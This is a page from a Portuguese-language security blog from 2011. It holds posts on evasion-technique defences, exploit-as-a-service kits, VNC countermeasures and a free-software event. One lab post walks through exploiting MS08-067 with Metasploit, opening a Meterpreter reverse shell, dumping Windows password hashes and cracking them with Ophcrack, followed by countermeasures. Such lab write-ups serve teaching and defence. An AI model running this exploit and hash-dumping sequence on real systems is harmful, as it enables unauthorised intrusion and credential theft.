Dicas de medidas preventivas contra técnicas avançadas de evasão
31 de Março de 2011, 0:00 - sem comentários ainda
As técnicas de invasão estão evoluindo diariamente tornando-se cada vez mais sofisticadas e de dificil detecção, principalmente porque as cooporações negligenciam uso de boas práticas.
As principais ferramentas do mercado, sejam elas proprietárias ou livres, dispõem de opções evasivas avançadas que dificultam a detecção de um ataque.
Algumas ações podem ser aplicadas como medida de prevenção contra técnicas avançadas de evasão ( TAE ):
1 – As TAEs diferem das ações evasivas tradicionais. É importante entender que elas não são ataques e sim formas de ocultar de um IPS ou firewall a exploração de uma vulnerabilidade, por isso é necessário entender seu funcionamento e as medidas de proteção.2 – Auditar constantemente a infraestrutura localizando vulnerabilidades e analisar e mitigar os riscos.
3 – Monitorar a atualização ( patchs ) de todos os sistemas constantemente. Os ataques só ocorrem quando existem vulnerabilidades para serem exploradas.
4 – Avaliar se as soluções de firewall e IPS estão preparadas para proteger a infraestrutura contra estas técnicas.
5 – Implantar uma gerência de segurança centralizada. A descentralização e a falta de uma gerência efetiva e pró-ativa dos dispositivos de segurança permitem que TAEs sejam aplicadas com sucesso garantido nos resultados.
6 – Simular ataques ( pen-testing ) usando estas técnicas no ambiente “real” com o objetivo de detectar o nível de proteção que os atuais dispositivos de segurança adotados na empresa podem propocionar.
A adoção destas medidas permite ampliar o conhecimento sobre o quanto sua infraestrutura de segurança está preparada para proteger seus ativos. O bom senso, conhecimento e cultura de segurança devem ser premissas básicas no dia a dia dos profissionais que são responsáveis pela salva-guarda dos ativos de uma empresa.
Fonte – Help Net Security
See:
- Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack
- Inimigos da segurança da informação – Meliante 3
- Protegendo seu WebServer contra o Slowloris HTTP DoS
- Usando o http-wp-plugins do Nmap para detectar plugins do WordPress
- Infraestrutura para Aplicações Web Seguras – Motivação
Cibercrime: EaaS ( exploit-as-a-service )
30 de Março de 2011, 0:00 - sem comentários ainda
Os cibercriminosos inauguram mais uma fase da evolução do SaaS: além de disponibilizarem conjuntos de ferramentas de exploração de vulnerabilidades de sites, associam serviços de hospedagem. É o “exploit-as-a-service”. Os clientes pagam pelo período de tempo em que as iniciativas estão infectando ativamente os computadores.
Os conjuntos de ferramentas oferecem vários tipos de “exploits”, ou seja, sequências de códigos capazes de permitir ao usuário tirar partido de vulnerabilidades de software, para introduzir malware em um sistema. Investigadores da Seculert descobriram que pelo menos um par desses conjuntos ou kits – Incognito 2.0 e Bomba – oferecem os seus próprios serviços de alojamento na web – assim como uma interface de gestão acessível pela internet.
O novo modelo de negócio torna mais fácil a vida dos cibercriminosos ou operadores com problemas em garantir a robustez do alojamento de servidores com malware, disse Aviv Raff, CTO e co-fundador da Seculert. A empresa especializou-se no serviço baseado em cloud computing que alerta os seus clientes para novos fenômenos de malware, vulnerabilidades e outras ameaças virtuais.
O conjunto de ferramentas descoberto destina-se a criminosos interessados em atacar um grande número de computadores com Microsoft Windows. Uma vez violada a segurança dos computadores, as máquinas podem ser usadas para roubar dados pessoais, enviar spam, e realizar ataques de negação de serviço…
Leia mais em IDG Now – Segurança
See:
Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack
29 de Março de 2011, 0:00 - sem comentários ainda<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo.png"><img class="alignleft size-medium wp-image-2337" title="metasploit-logo" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo-300x197.png" height="197" alt="" width="300" /></a>Quando o assunto é <a href="http://blog.alexos.com.br/en.wikipedia.org/wiki/Payload_(software)">payload</a> o <a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_About_Meterpreter"> Meterpreter </a> é sem sombra de dúvidas o estado da arte. Como ele é executado na memória da vitima acaba se tornando um alvo de dificil detecção por antivírus e IPSs.</p> <p>Ele é recheado de comandos que permitem diversas ações desde visualização das informações até controle do microfone e webcam do alvo.</p> <p>Neste láb. irei usar o hashdump para obter o dump de senhas e farei um password brute force usando o Ophcrack. O <a href="http://ophcrack.sourceforge.net/">Ophcrack</a> é um password cracker multiplataforma livre baseado em <a href="http://en.wikipedia.org/wiki/Rainbow_table">rainbow tables</a> para quebra de senha de sistemas Windows.</p> <p>Existem <a href="http://ophcrack.sourceforge.net/tables.php">tables gratuitas</a> no site da ferramenta, porém a tables especiais são encontradas no lado negro da força.</p> <p><strong><br /> Vamos aos testes<br /> </strong></p> <p>Iniciando um conexão com o Meterpreter e obtendo o dump de senhas</p> <blockquote><p> msf exploit(ms08_067_netapi) > exploit</p> <p>[*] Started reverse handler on 11.11.11.11:4444<br /> [*] Automatically detecting the target…<br /> [*] Fingerprint: Windows 2003 – No Service Pack – lang:Unknown<br /> [*] Selected Target: Windows 2003 SP0 Universal<br /> [*] Attempting to trigger the vulnerability…<br /> [*] Sending stage (749056 bytes) to 11.11.11.11<br /> [*] Meterpreter session 1 opened (11.11.11.11:4444 -> 11.11.11.11:1031) at Mon Mar 28 20:41:25 -0300 2011 </p></blockquote> <blockquote><p> meterpreter > hashdump</p> <p><strong>Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::</strong><br /> Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br /> SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:9ccce0e593125118ac7357e105e50589::: </p></blockquote> <p>Com o hash em mão é hora do Ophcrack fazer o trabalho sujo!</p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack1.png"><img class="alignnone size-medium wp-image-2363" title="ophcrack1" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack1-300x187.png" height="187" alt="" width="300" /></a></p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack21.png"><img class="alignnone size-medium wp-image-2368" title="ophcrack2" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack21-300x187.png" height="187" alt="" width="300" /></a></p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack3.png"><img class="alignnone size-medium wp-image-2369" title="ophcrack3" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack3-300x187.png" height="187" alt="" width="300" /></a></p> <p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack4.png"><img class="alignnone size-medium wp-image-2371" title="ophcrack4" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack4-300x187.png" height="187" alt="" width="300" /></a></p> <p>Como vocês podem ver o Ophcrack levou cerca de 11 min para quebrar está senha relativamente fácil.<br /> <strong><br /> Contramedidas<br /> </strong></p> <p>Use as seguintes medidas preventivas contra este tipo de ataque:</p> <blockquote><p> <strong>1 – Use senhas complexas;</p> <p>2 – Não use somente um tipo de autenticação. Além de algo que você sabe é interessante usar algo que você tem ( e.g. token, biometria );</p> <p>3 – Mantenha seu sistema atualizado;</p> <p>4 – Mantenha o firewall local ativado;</p> <p>5 – Use sistemas de proteção robustos e com checagem em tempo real da memória; </p> <p>6 – Se você não está afim de gastar ( item 5 ) então utilize o <a href="http://www.microsoft.com/security_essentials/">MSE</a> ( Microsoft Security Essentials ) juntamente com um <a href="http://www.firewallguide.com/software.htm">firewall pessoal</a>.</strong> </p></blockquote> <p><strong><br /> Mais informações:<br /> </strong></p> <p><a href="http://support.microsoft.com/kb/299656">How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databases</a></p> <p><a href="http://technet.microsoft.com/en-us/library/cc512606.aspx">Frequently Asked Questions about Passwords and Password Attacks</a></p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2335&lang=pt-br" class="crp_title">MSF Meterpreter: Quebrando senhas do VNC</a></li><li><a href="http://blog.alexos.com.br/?p=2180&lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=2344&lang=pt-br" class="crp_title">Meterpreter: VNC Crack Contramedidas</a></li><li><a href="http://blog.alexos.com.br/?p=2302&lang=pt-br" class="crp_title">Usando o http-wp-plugins do Nmap para detectar plugins do WordPress</a></li><li><a href="http://blog.alexos.com.br/?p=1119&lang=pt-br" class="crp_title">Quebre senhas online ( Updated )</a></li></ul></div>
Meterpreter: VNC Crack Contramedidas
28 de Março de 2011, 0:00 - sem comentários aindaSeguem algumas recomendações de como se previnir contra o ataque de VNC Password Cracking usando o módulo enum_vnc_passwd do MSF Meterpreter.
0 – Use senhas complexas;
1 – Bloqueie todos os acessos externos usando o firewall do Windows ou do seu Antivírus, se existir este recurso é claro. Para quem usa Linux recomendo o Firestarter;
2 – Crie uma regra permitindo somente o acesso as portas TCP 5900/5800 através de seu ip externo. Por exemplo se você acessa sua máquina do trabalho libere o acesso apenas para o ip do NAT ( 200.x.x.x );
3 – Configure uma VPN;
4 – Altere as portas padrões do VNC;
5 – Não use VNC. ;-P
OBS: Para mim a opção 03 é a mais recomendada.
See:
Participe do FLISOL 2011 em Salvador
22 de Março de 2011, 0:00 - sem comentários aindaFLISoL — Festival Latinoamericano de Instalação de Software Livre — é o maior evento de difusão de Software Livre da América Latina e acontece paralelamente em várias cidades no Brasil e em toda a América Latina. Participe!
Dessa vez o evento será realizado junto ao Gnome Release Party e openSUSE Release Party, ou seja, será uma GRANDE festa!
Convido todos os interessados por software livre, principalmente os iniciantes, para esse evento que visa, primeiramente, divulgar o software livre para os leigos e, como sempre, congregar os companheiros da comunidade.
Site: http://softwarelivre.org/flisol-ssa/2011
Local: Faculdade Dom Pedro II
End: Av. Estados Unidos nº 20 – Comércio. Salvador-BA
Mapa de Localização: Google Maps
Infelizmente não poderei participar deste grande evento pois estarei no Web Security Forum.
Boa sorte a todos!!!
